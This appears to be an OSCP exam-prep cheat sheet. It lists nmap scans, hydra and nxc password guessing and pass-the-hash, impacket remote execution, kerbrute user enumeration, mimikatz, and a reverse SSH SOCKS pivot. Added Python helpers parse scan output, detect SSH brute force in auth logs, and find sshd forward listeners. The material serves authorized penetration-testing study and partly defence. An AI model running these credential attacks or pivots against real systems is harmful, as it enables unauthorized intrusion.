# Guideline

## Scanning shit

### nmap

{% code overflow="wrap" fullWidth="true" %}

```
To Run
    # -oN writes normal output to a file; a bare -o is not a valid nmap option
    sudo nmap <IP>/<subnet mask> -oN network.nmap
    sudo nmap -sV -sC -sT -T4 -A --top-ports=100 --open <IP> -Pn -oN target.commonmap
    sudo nmap -sV -sC -sT -T4 -A -p- --open <IP> -Pn -oN target.fullmap

In case of slow scans (find open ports first, then fingerprint only those)
    sudo nmap -p- --open <IP> -Pn -oN target.fullmap
    sudo nmap -sV -sC -sT -T4 -A -p<ports> --open <IP> -Pn -oN target.<port>map

When not sure about service vulnerability (look for EDB-ID tags in the output)
    sudo nmap -sV -p<ports> --script "vuln" <IP> -oN target.vulnmap
```

{% endcode %}

Refer to [Service Enumeration](/oscp-exam-prep/commons/service-enumeration.md) for the respective services.
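The two-step "slow scan" workflow above means reading the `-p-` output by hand to build the `-p<ports>` list for the follow-up scan. The following is an added example (Python, not part of this page or of nmap) that parses `-oN` output, lists the open ports per host, emits the comma-separated `-p` value for the targeted `-sV -sC` run, and points out services nmap could not fingerprint, which are the ones that still need manual enumeration. The scan output embedded below is constructed for the example, not a real result.

```python
"""Summarise nmap normal-format (-oN) output: open ports per host, the -p list
for the follow-up scan, and services with no version string.
Added example; the sample output below is constructed, not a real scan."""
import re
from collections import defaultdict

# Constructed -oN output for two hosts (hostnames/IPs are placeholders)
SAMPLE_NMAP = """\
# Nmap 7.94 scan initiated Mon Jan  1 10:00:00 2024 as: nmap -p- --open -Pn -oN target.fullmap 10.10.10.0/29
Nmap scan report for 10.10.10.5
Host is up (0.020s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE    SERVICE       VERSION
22/tcp    open     ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp    open     http          Apache httpd 2.4.41 ((Ubuntu))
445/tcp   open     microsoft-ds
8080/tcp  filtered http-proxy
Nmap scan report for dc01.example.local (10.10.10.6)
Host is up (0.031s latency).
PORT      STATE    SERVICE       VERSION
3389/tcp  open     ms-wbt-server
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
# Nmap done at Mon Jan  1 10:05:00 2024 -- 2 IP addresses (2 hosts up) scanned in 300.00 seconds
"""

# "Nmap scan report for <name> (<ip>)" or "Nmap scan report for <ip>"
HOST_RE = re.compile(r"^Nmap scan report for (\S+)(?: \(([\d.]+)\))?")
# "<port>/<proto> <state> <service> [<version ...>]"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_nmap_normal(text):
    """Return {host: [(port, proto, service, version), ...]} for open ports only."""
    hosts = defaultdict(list)
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(2) or m.group(1)   # prefer the IP when a name was resolved
            continue
        m = PORT_RE.match(line)
        if m and current and m.group(3) == "open":
            port, proto, _state, service, version = m.groups()
            hosts[current].append((int(port), proto, service, (version or "").strip()))
    return dict(hosts)


def port_list(ports):
    """Comma-separated ports, ready to paste into -p<ports> for the targeted scan."""
    return ",".join(str(p) for p in sorted(p for p, _proto, _svc, _ver in ports))


def unversioned(ports):
    """Open services nmap printed without a version: enumerate these manually."""
    return [(p, svc) for p, _proto, svc, ver in ports if not ver]


if __name__ == "__main__":
    for host, ports in parse_nmap_normal(SAMPLE_NMAP).items():
        print(f"{host}: -p{port_list(ports)}")
        for p, svc in unversioned(ports):
            print(f"  {p}/{svc}: no version string, enumerate by hand")
```

Run it against a real `target.fullmap` by replacing `SAMPLE_NMAP` with the file contents; the same parser works on output from the `--top-ports` and `-p-` scans since both are normal format.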

### Checking remote access viability (requires credentials)

#### SSH

{% code overflow="wrap" fullWidth="true" %}

```
hydra -l <username> -P <wordlist> -s <port number> ssh://<target ip address>
hydra -L <username list> -P <wordlist> -s <port number> ssh://<target ip address>

To access:
    ssh <username>@<IP>
    ssh -i <private key> <username>@<IP> -o "IdentitiesOnly=yes"
```

{% endcode %}
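The two hydra forms above leave very different traces on the target: `-l` with a wordlist produces a burst of failures against one account, `-L` with a user list produces failures spread across many accounts from the same source, and a guessed credential shows up as an `Accepted` right after the burst. The following is an added example (Python, not part of this page or of hydra) that applies those three rules to sshd lines from `/var/log/auth.log`; the window, the threshold and the log lines themselves are constructed for the example.

```python
"""Flag SSH password guessing in sshd auth.log lines: one source hammering one
account (brute force), one source walking many accounts (spray), and a
successful login that follows such a burst. Added example; the log below is
constructed, and the window/threshold values are illustrative."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log excerpt: a brute force from 10.10.14.3 that succeeds,
# a spray from 10.10.14.9, and a benign key login from 192.168.1.20.
SAMPLE_AUTH_LOG = """\
Jan  1 10:00:01 host sshd[1201]: Failed password for alice from 10.10.14.3 port 50110 ssh2
Jan  1 10:00:02 host sshd[1202]: Failed password for alice from 10.10.14.3 port 50111 ssh2
Jan  1 10:00:02 host sshd[1203]: Failed password for alice from 10.10.14.3 port 50112 ssh2
Jan  1 10:00:03 host sshd[1204]: Failed password for alice from 10.10.14.3 port 50113 ssh2
Jan  1 10:00:04 host sshd[1205]: Failed password for alice from 10.10.14.3 port 50114 ssh2
Jan  1 10:00:05 host sshd[1206]: Accepted password for alice from 10.10.14.3 port 50115 ssh2
Jan  1 10:00:09 host sshd[1210]: Failed password for invalid user bob from 10.10.14.9 port 40001 ssh2
Jan  1 10:00:09 host sshd[1211]: Failed password for invalid user carol from 10.10.14.9 port 40002 ssh2
Jan  1 10:00:10 host sshd[1212]: Failed password for dave from 10.10.14.9 port 40003 ssh2
Jan  1 10:00:10 host sshd[1213]: Failed password for invalid user erin from 10.10.14.9 port 40004 ssh2
Jan  1 10:00:11 host sshd[1214]: Failed password for frank from 10.10.14.9 port 40005 ssh2
Jan  1 10:30:00 host sshd[1300]: Failed password for alice from 192.168.1.20 port 33000 ssh2
Jan  1 10:30:05 host sshd[1301]: Accepted publickey for alice from 192.168.1.20 port 33001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse(lines, year=2024):
    """Return (timestamp, result, method, user, ip) tuples; syslog lines carry no year."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["result"], m["method"], m["user"], m["ip"]))
    return events


def detect(events, window_s=60, threshold=5):
    """Per source IP: brute_force = accounts with >= threshold failures inside the
    window, spray = >= threshold distinct accounts failing inside the window,
    success_after_burst = accounts accepted while such a burst was in progress."""
    by_ip = defaultdict(list)
    for ev in sorted(events):
        by_ip[ev[4]].append(ev)
    findings = {}
    for ip, evs in by_ip.items():
        brute, success, spray = set(), set(), False
        for i, (ts, result, _method, user, _ip) in enumerate(evs):
            recent = [e for e in evs[:i + 1] if (ts - e[0]).total_seconds() <= window_s]
            fails = [e for e in recent if e[1] == "Failed"]
            if len(fails) < threshold:
                continue
            users = {e[3] for e in fails}
            if len(users) == 1:
                brute.add(next(iter(users)))
            elif len(users) >= threshold:
                spray = True
            if result == "Accepted":
                success.add(user)
        if brute or spray or success:
            findings[ip] = {"brute_force": sorted(brute), "spray": spray,
                            "success_after_burst": sorted(success)}
    return findings


if __name__ == "__main__":
    for ip, f in detect(parse(SAMPLE_AUTH_LOG.splitlines())).items():
        print(ip, f)
```

The `success_after_burst` entries are the ones worth acting on first: they are the accounts whose password was actually guessed, and the fix is the usual one (key-only authentication, lockout or rate limiting on sshd, and rotating that credential).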

#### SMB

{% code overflow="wrap" fullWidth="true" %}

```
nxc smb <IP> -d <domain name> -u users.txt -p passwords.txt --continue-on-success
nxc smb <IP> -d <domain name> -u users.txt -H hashes.txt --continue-on-success

To access:
    impacket-smbexec [domain\\]<username>[:password]@<IP>
    impacket-psexec [domain\\]<username>[:password]@<IP>
    impacket-wmiexec [domain\\]<username>[:password]@<IP>
```

{% endcode %}

#### WINRM

{% code overflow="wrap" fullWidth="true" %}

```
nxc winrm <IP> -d <domain name> -u users.txt -p passwords.txt --continue-on-success
nxc winrm <IP> -d <domain name> -u users.txt -H hashes.txt --continue-on-success

To access:
    evil-winrm -i <ip> -u [domain\\]<username> -p <password>
    # You can download files with the download keyword
```

{% endcode %}

#### RDP

{% code overflow="wrap" fullWidth="true" %}

```
nxc rdp <IP> -d <domain name> -u users.txt -p passwords.txt --continue-on-success
nxc rdp <IP> -d <domain name> -u users.txt -H hashes.txt --continue-on-success

To access:
    xfreerdp /d:<domain name> /u:<username> /p:<password> /v:<IP> /kbd:0x0000040a +clipboard /cert:ignore /size:70% +drive:/kali/directory,KALISHARE
```

{% endcode %}

* Check service version
* Check CMS version
* Check for LFI vulnerabilities
* Check for SQL injection (SQLi)

#### Kerbrute (Checking valid usernames with DC)

{% code overflow="wrap" fullWidth="true" %}

```
# Download the release binary for your platform; the repository URL itself serves HTML, not the binary
wget -O kerbrute <kerbrute release binary URL> && chmod +x kerbrute
./kerbrute userenum users.txt --dc <DC IP> --domain <domain>
```

{% endcode %}

## Enumeration on the inside

### Linux

* Run linPEAS.sh
* For manual enumeration, refer to [Linux](/oscp-exam-prep/enumeration/linux.md)

### Windows

* Run winPEASx64.exe or winPEASx32.exe
* Run mimikatz.exe
* For manual enumeration, refer to [Windows](/oscp-exam-prep/enumeration/windows.md)

## Pivoting

* Reverse SSH connection

{% code overflow="wrap" fullWidth="true" %}

```
On Kali Machine:
    sudo systemctl start ssh
    sudo nano /etc/proxychains.conf
    > Append: socks5 127.0.0.1 <Kali Port>

On target Pivot Machine (a -R with only a port opens a reverse SOCKS proxy, OpenSSH 7.6+):
    ssh -N -R <Kali Port> kali@<Kali IP>

To verify on Kali Machine (expect an sshd-owned LISTEN socket on 127.0.0.1:<Kali Port>):
    ss -ntplu

To use:
    proxychains <command>
```

{% endcode %}
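The `ss -ntplu` verification step above amounts to looking for a `LISTEN` socket owned by `sshd` on the chosen port. The following is an added example (Python, not part of this page or of `ss`) that parses that output, confirms the SOCKS listener for the pivot, and more generally lists every sshd-owned listener that is not the daemon's own port. On Kali that is the tunnel; on any other host the same query is the check a defender runs to spot remote port forwards terminating there. The `ss` output below is constructed, and `1080` stands in for `<Kali Port>`.

```python
"""Parse `ss -ntplu` output and find sshd-owned listeners other than the SSH
service port, i.e. remote (-R) port forwards. Added example; the ss output
below is constructed and 1080 is a placeholder for <Kali Port>."""
import re

# Constructed `sudo ss -ntplu` output (the Process column is only shown as root)
SAMPLE_SS = """\
Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
udp   UNCONN 0      0           0.0.0.0:68         0.0.0.0:*     users:(("dhclient",pid=700,fd=6))
tcp   LISTEN 0      128         0.0.0.0:22         0.0.0.0:*     users:(("sshd",pid=900,fd=3))
tcp   LISTEN 0      128       127.0.0.1:1080      0.0.0.0:*     users:(("sshd",pid=4120,fd=9))
tcp   LISTEN 0      128            [::]:22            [::]:*     users:(("sshd",pid=900,fd=4))
"""

PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+)')


def parse_ss(text):
    """Return one dict per socket line: proto, state, addr, port, proc, pid."""
    socks = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6 or parts[0] == "Netid":   # skip header / short lines
            continue
        netid, state, _recvq, _sendq, local, _peer = parts[:6]
        process = parts[6] if len(parts) > 6 else ""   # absent when not run as root
        addr, port = local.rsplit(":", 1)               # works for [::]:22 as well
        m = PROC_RE.search(process)
        socks.append({
            "proto": netid,
            "state": state,
            "addr": addr,
            "port": int(port) if port.isdigit() else None,
            "proc": m.group(1) if m else None,
            "pid": int(m.group(2)) if m else None,
        })
    return socks


def listener_on(socks, port):
    """LISTEN sockets bound to the given port (the pivot's SOCKS port on Kali)."""
    return [s for s in socks if s["port"] == port and s["state"] == "LISTEN"]


def sshd_forward_listeners(socks, ssh_port=22):
    """sshd-owned LISTEN sockets that are not the SSH service itself. On Kali this
    is the -R SOCKS listener; on a monitored host it is evidence of a remote
    forward terminating there."""
    return [s for s in socks
            if s["proc"] == "sshd" and s["state"] == "LISTEN" and s["port"] != ssh_port]


if __name__ == "__main__":
    socks = parse_ss(SAMPLE_SS)
    for s in sshd_forward_listeners(socks):
        print(f"sshd forward listener {s['addr']}:{s['port']} (pid {s['pid']})")
    print("socks ready:", bool(listener_on(socks, 1080)))
```

If the listener shows up bound to `0.0.0.0` rather than `127.0.0.1`, the Kali sshd has `GatewayPorts` enabled and the proxy is reachable from the network, which is rarely what you want during an engagement.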

* Refer to [Port Forwarding](/oscp-exam-prep/commons/port-forwarding.md) and [Port Forwarding Extras](/oscp-exam-prep/port-forwarding-extras/linux.md) for other methods
  * Consider using Chisel for a Linux pivot
  * Consider using Chisel or Plink.exe for a Windows pivot
